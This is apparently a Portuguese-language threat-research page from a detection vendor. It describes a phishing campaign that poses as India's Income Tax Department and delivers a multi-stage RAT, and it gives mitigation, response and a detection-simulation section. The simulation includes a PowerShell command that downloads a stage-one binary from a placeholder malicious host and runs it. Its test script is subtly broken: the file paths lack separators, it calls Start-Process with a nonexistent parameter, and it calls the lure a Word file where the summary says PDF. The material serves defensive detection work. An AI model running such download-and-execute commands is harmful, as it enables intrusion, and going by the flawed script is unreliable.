SOC Prime Bias: Médio

30 Dec 2025 13:29 UTC

Campanha de Phishing Finge Ser Imposto de Renda da Índia para Alvejar Empresas

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Campanha de Phishing Finge Ser Imposto de Renda da Índia para Alvejar Empresas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Uma operação de phishing que imita o Departamento de Imposto de Renda da Índia entrega um PDF armadilhado que direciona os destinatários para um portal de conformidade falso. O site solicita que as vítimas baixem um pacote ZIP contendo um instalador NSIS assinado, que posteriormente implanta um Trojan de Acesso Remoto multiestágio. O RAT persiste ao criar um serviço do Windows e se comunica com vários servidores C2 por portas não padrão.

Investigação

Pesquisadores analisaram a isca em PDF, a URL incorporada e o fluxo de trabalho em cadeia do instalador NSIS. Eles documentaram os binários soltos no disco, a criação de uma pasta de instalação oculta e o registro de NSecRTS.exe como um serviço do Windows. O estudo também capturou comunicações de saída para três endereços IP e destacou o uso de cargas úteis assinadas em toda a cadeia de entrega.

Mitigação

Bloqueie o domínio malicioso e os endereços IP relacionados no perímetro e através de controles de proxy. Reforce as proteções de e-mail para sinalizar anexos e links temáticos de impostos que levam a portais de conformidade semelhantes. Impeça a execução automática de instaladores não confiáveis, sempre que possível, e monitorize a criação de serviços suspeitos – especialmente qualquer coisa nomeada “Windows Real-time Protection Service.”

Resposta

Alerta sobre os nomes de arquivos listados, hashes e atividade de registro de serviços do Windows vinculadas à cadeia de infecção. Isole endpoints afetados, adquira imagens de memória e disco, e realize uma varredura forense completa para identificar quaisquer etapas ou ferramentas adicionais do RAT. Remova artefatos de persistência e redefina credenciais potencialmente expostas para evitar reentrada.

Fluxo de ataque

Execução de Simulação

Pré-requisito: O Cheque Pré-voo de Telemetria & de Referência deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa do Ataque & Comandos:
    Um adversário entrega um e-mail de phishing intitulado “Aviso de Imposto de Renda”. O anexo é um documento Word malicioso que solta setup_Ir5swQ3EpeuBpePEpew=.exe to %TEMP%. A vítima executa o arquivo, que por sua vez gera Sibuia.exe (a carga verdadeira) como seu filho. Esta cadeia pai-filho é projetada para contornar alertas genéricos de criação de processos, mas é pega pela regra Sigma.

    Etapas realizadas no host comprometido:

    1. Solte o binário de primeira etapa:
      $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1
    2. Execute o binário de primeira etapa:
      Start-Process -FilePath $stage1 -NoNewWindow
    3. O binário de primeira etapa cria internamente o binário de segunda etapa Sibuia.exe no mesmo diretório e o lança: (Simulado pelo script de teste abaixo.)
  • Script de Teste de Regressão:
    O script abaixo reproduz a relação exata pai-filho necessária para disparar a regra.

    # -------------------------------------------------
    # Simulação da cadeia de phishing do Imposto de Renda Indiano
    # -------------------------------------------------
    # Definir caminhos
    $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
    $stage2 = "$env:TEMPSibuia.exe"
    
    # Criar binários dummy (zero-byte – suficiente para registro Sysmon)
    Set-Content -Path $stage1 -Value 'REM placeholder para stage1' -Encoding ASCII
    Set-Content -Path $stage2 -Value 'REM placeholder para stage2' -Encoding ASCII
    
    # Garantir que os arquivos sejam executáveis (Windows não precisa de chmod)
    Write-Host "[*] Iniciando stage1..."
    $proc1 = Start-Process -FilePath $stage1 -PassThru
    
    # Dar um momento para stage1 “gerar” stage2 (simulado por lançamento direto)
    Start-Sleep -Milliseconds 500
    
    Write-Host "[*] Stage1 gerando stage2 (Sibuia.exe)..."
    $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id
    
    Write-Host "[+] Simulação completa. Verifique a detecção no SIEM."
    # -------------------------------------------------
  • Comandos de Limpeza:
    Remova os artefatos e termine quaisquer processos remanescentes.

    # Pare quaisquer processos restantes
    Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force
    Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Excluir arquivos
    Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue
    
    Write-Host "[*] Limpeza completa."